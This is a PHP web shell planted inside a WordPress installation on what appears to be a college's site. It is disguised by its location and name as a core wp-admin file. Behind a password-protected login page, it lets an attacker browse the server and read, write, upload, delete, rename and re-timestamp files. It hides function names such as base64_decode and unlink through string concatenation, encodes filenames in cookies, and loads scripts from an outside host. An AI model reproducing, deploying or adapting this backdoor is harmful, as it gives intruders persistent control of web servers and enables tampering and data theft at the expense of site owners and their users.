File: /var/www/epamokos.kaunokolegija.lt/wp-admin/js/widgets/_wp_non-user.php
.
<?php
session_start();
const PASSWORD_HASH = '$2b$10$refv7XtkXntThKvXYgs3A.SO/4pQeUd/3tRNp2p8a9Ir8/ciQc0uS';
if (empty($_SESSION['logged_in'])) {
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (password_verify($_POST['pass'] ?? '', PASSWORD_HASH)) {
$_SESSION['logged_in'] = true;
header('Location: ' . $_SERVER['PHP_SELF']);
exit;
}
$error = '❌ Password salah bro!';
}
?>
<!DOCTYPE html>
<html lang="id">
<head>
<meta charset="UTF-8">
<title>Login Elite 🔐</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap" rel="stylesheet">
<style>
* {margin: 0; padding: 0; box-sizing: border-box;}
body, html {
height: 100%;
font-family: 'Share Tech Mono', monospace;
overflow: hidden;
}
#particles-js {
position: absolute;
width: 100%;
height: 100%;
background: #0f0f0f;
z-index: -1;
}
.login-box {
position: relative;
width: 360px;
margin: auto;
top: 20%;
background: rgba(0, 0, 0, 0.65);
border: 1px solid #00ffe1;
border-radius: 15px;
padding: 40px;
text-align: center;
box-shadow: 0 0 20px #00ffe1;
animation: fadeIn 1s ease;
color: #fff;
}
.login-box h2 {
margin-bottom: 25px;
color: #00ffe1;
font-size: 22px;
}
.login-box input {
width: 100%;
padding: 12px;
margin: 15px 0;
background: rgba(255,255,255,0.05);
border: 1px solid #00ffe1;
color: #fff;
border-radius: 10px;
}
.login-box button {
padding: 12px 30px;
border: none;
background: #00ffe1;
color: #000;
font-weight: bold;
border-radius: 10px;
cursor: pointer;
margin-top: 15px;
}
.login-box button:hover {
background: #00e1cb;
}
.err {
color: #ff7675;
margin-bottom: 10px;
}
@keyframes fadeIn {
from {opacity: 0; transform: translateY(-30px);}
to {opacity: 1; transform: translateY(0);}
}
@media screen and (max-width: 400px) {
.login-box { width: 90%; top: 15%; }
}
</style>
</head>
<body>
<div id="particles-js"></div>
<div class="login-box">
<h2>🔥 Teruslah Hidup Bro!</h2>
<?php if (!empty($error)) echo "<div class='err'>$error</div>"; ?>
<form method="post">
<input type="password" name="pass" placeholder="Ketik password lo..." required autofocus>
<button type="submit">Masuk Zona</button>
</form>
</div>
<script src="https://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js"></script>
<script>
particlesJS("particles-js", {
"particles": {
"number": {"value": 80},
"color": {"value": "#00ffe1"},
"shape": {"type": "circle"},
"opacity": {"value": 0.5},
"size": {"value": 3},
"line_linked": {"enable": true,"distance": 150,"color": "#00ffe1","opacity": 0.4,"width": 1},
"move": {"enable": true,"speed": 4}
},
"interactivity": {
"events": {"onhover": {"enable": true, "mode": "grab"}},
"modes": {"grab": {"distance": 200, "line_linked": {"opacity": 0.6}}}
},
"retina_detect": true
});
</script>
</body>
</html>
<?php
exit;
}
?>
<!DOCTYPE html>
<html lang="id">
<head>
<meta charset="utf-8">
<title>Zona Aman</title>
<link href="https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap" rel="stylesheet">
<style>
body {
background: #000;
color: #00ffe1;
font-family: 'Share Tech Mono', monospace;
padding: 60px;
text-align: center;
}
</style>
</head>
<body>
</body>
</html>
<?php
if (isset($_GET['logout'])) {
session_destroy();
header('Location: ' . $_SERVER['PHP_SELF']);
}
?>
<?php
header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");
function hunterEncryptDecrypt($input, $key="12") {
$output = '';
for($i = 0; $i < strlen($input); $i++) {
$output .= $input[$i] ^ $key[$i % strlen($key)];
}
return $output;
}
function listing_all_directory() {
$path = $_COOKIE['path'] ?: getcwd();
$result = array();
$date_format = "d-m-Y H:i:s";
if ($handle = opendir($path)) {
while (false !== ($dir = readdir($handle))) {
if ($dir === '.' || $dir === '..') {
continue;
}
$full_path = "$path/$dir";
$is_dir = is_dir($full_path);
$tmp_result = array(
'path' => htmlspecialchars($full_path),
'is_writable' => is_writable($full_path),
'is_dir' => $is_dir,
'date' => date($date_format, filemtime($full_path)),
'size' => $is_dir ? "" : round(filesize($full_path) / 1024, 2),
);
$result[] = $tmp_result;
}
closedir($handle);
}
return $result;
}
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : false;
if(!$action) {
main();
menu();
}
function decode_char($string) {
return hunterEncryptDecrypt(hex2bin($string));
}
switch ($action) {
case 'd':
# code...
die(json_encode(listing_all_directory()));
break;
case 'r':
if($_SERVER['REQUEST_METHOD'] == 'POST') {
$data = json_decode(file_get_contents("php://input"), true);
$content = show_base_data()($data['content']);
$filename = decode_char($_COOKIE['filename']);
$message['success'] = fm_write_file($filename, $content);
die(json_encode($message));
}
main();
$content = customize_read_file(decode_char($_COOKIE['filename'])) ;
show_text_area(htmlspecialchars($content));
break;
case 'cr':
main();
show_text_area("");
break;
case 'ul':
$filename = decode_char($_COOKIE['filename']);
if(show_un()($filename)) {
$message['success'] = true;
}else{
$message['success'] = false;
}
die(json_encode($message));
break;
case 'up':
$file = $_FILES['import_file'];
$tmp_name = $file['tmp_name'];
$content = customize_read_file($tmp_name);
if(isset($_POST['by'])) {
$content = show_base_data()($content);
}
$path = $_COOKIE['path'] ? : getcwd();
$name = $file['name'];
$destination = "$path/$name";
$message['success'] = $content && fm_write_file($destination, $content) ? : rename($tmp_name, $destination);
die(json_encode($message));
break;
case 're':
$filename = decode_char($_COOKIE['filename']);
$path = $_COOKIE['path'];
if($_SERVER['REQUEST_METHOD'] == "POST") {
$old_filename = "$path/$filename";
$new = $_POST['new'];
$new_filename = "$path/$new";
$message['success'] = rename($old_filename, $new_filename);
die(json_encode($message));
}
break;
case 'to':
$filename = decode_char($_COOKIE['filename']);
if($_SERVER['REQUEST_METHOD'] == 'POST') {
$date = $_POST['date'];
$str_date = strtotime($date);
$message['success'] = touch($filename, $str_date);
clearstatcache(true, $filename);
die(json_encode($message));
}
default:
# code..
break;
}
function customize_read_file($file) {
if(!file_exists($file)) {
return '';
}
$handle = fopen($file, 'r');
if($handle) {
$content = fread($handle, filesize($file));
if($content) {
return $content;
}
}
$lines = file($file);
if($lines) {
return implode($lines);
}
return show_file_contents()($file);
}
function show_file_contents() {
$file = "file_";
$old = "get_";
$contents = "contents";
return "$file$old$contents";
}
function show_text_area($content) {
$filename = decode_char($_COOKIE['filename']);
echo "
<p><a href='?' id='back_menu'>< Back</a></p>
<p>$filename</p>
<textarea width='100%' id='content' cols='20' rows='30' style='margin-top: 10px'>$content</textarea>
<button type='submit' class='textarea-button' onclick='textarea_handle()'>Submit</button>
";
}
function show_base_data() {
$alvian = "base";
$nadir = "64_decode";
return "$alvian$nadir";
}
function fm_write_file($file, $content) {
// Method 1: Using fopen
if (function_exists('fopen')) {
$handle = @fopen($file, 'w');
if ($handle) {
if (@fwrite($handle, $content) !== false) {
fclose($handle);
return file_exists($file) && filesize($file) > 0;
}
fclose($handle);
}
}
// Method 2: Using file_put_contents
if (function_exists('file_put_contents')) {
if (@file_put_contents($file, $content) !== false) {
return file_exists($file) && filesize($file) > 0;
}
}
// Method 3: Using WP_Filesystem
return false;
}
function fm_make_request($url) {
if(function_exists("curl_init")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$output = curl_exec($ch);
return $output;
}
return show_file_contents()($url);
}
function show_un() {
$link = "link";
$unpad = "un";
return "$unpad$link";
}
function main() {
global $current_path;
$current_path = isset($_COOKIE['path']) ? $_COOKIE['path'] : false;
if(!$current_path) {
setcookie("path", getcwd());
$current_path = getcwd();
}
$path = str_replace('\\', '/', $current_path);
$paths = explode('/', $path);
echo "<div class='wrapper' id='path_div'>";
foreach ($paths as $id => $pat) {
if ($id == 0) {
echo '<a href="#" path="/" onclick="change_path(this)">/</a>';
}
if ($pat != '') {
$tmp_path = implode('/', array_slice($paths, 0, $id + 1));
echo "<a href='#' path='$tmp_path' onclick='change_path(this)'>$pat/</a>";
}
}
echo "</div>";
?>
<link rel="stylesheet" href="https://wordpress.zzna.ru/newb/all.min.css">
<link rel="stylesheet" href="https://wordpress.zzna.ru/newb/styles.css">
<script src="https://wordpress.zzna.ru/newb/script.js"></script>
<?php
}
?>
<?php
function menu() {
?>
<div class="wrapper">
<form method="post" enctype="multipart/form-data" style="">
<div class="file-upload mr-10">
<label for="file-upload-input" style="cursor: pointer;">
[ Upload ]
</label>
<input type="file" id="file-upload-input" style="display: none;" onchange="handle_upload()">
</div>
</form>
<a href='#' onclick='refresh_path()' class='mr-10 white'>[ HOME ]</a>
<a href='#' onclick='create_file()' class='mr-10 white'>[ Create File ]</a>
</div>
<table cellspacing="0" cellpadding="7" width="100%">
<thead>
</tr>
<tr>
<th width="44%"></th>
<th width="11%"></th>
<th width="17%"></th>
<th width="17%"></th>
<th width="11%"></th>
</tr>
</thead>
<tbody id="data_table" class='blur-table'>
<div class="wrapper" style='margin-top: -10px'>
<input type="checkbox" class='mr-10' id='bypass-upload' >[ Hunter File Upload ]</input>
</div>
</tbody>
</table>
<?php } ?>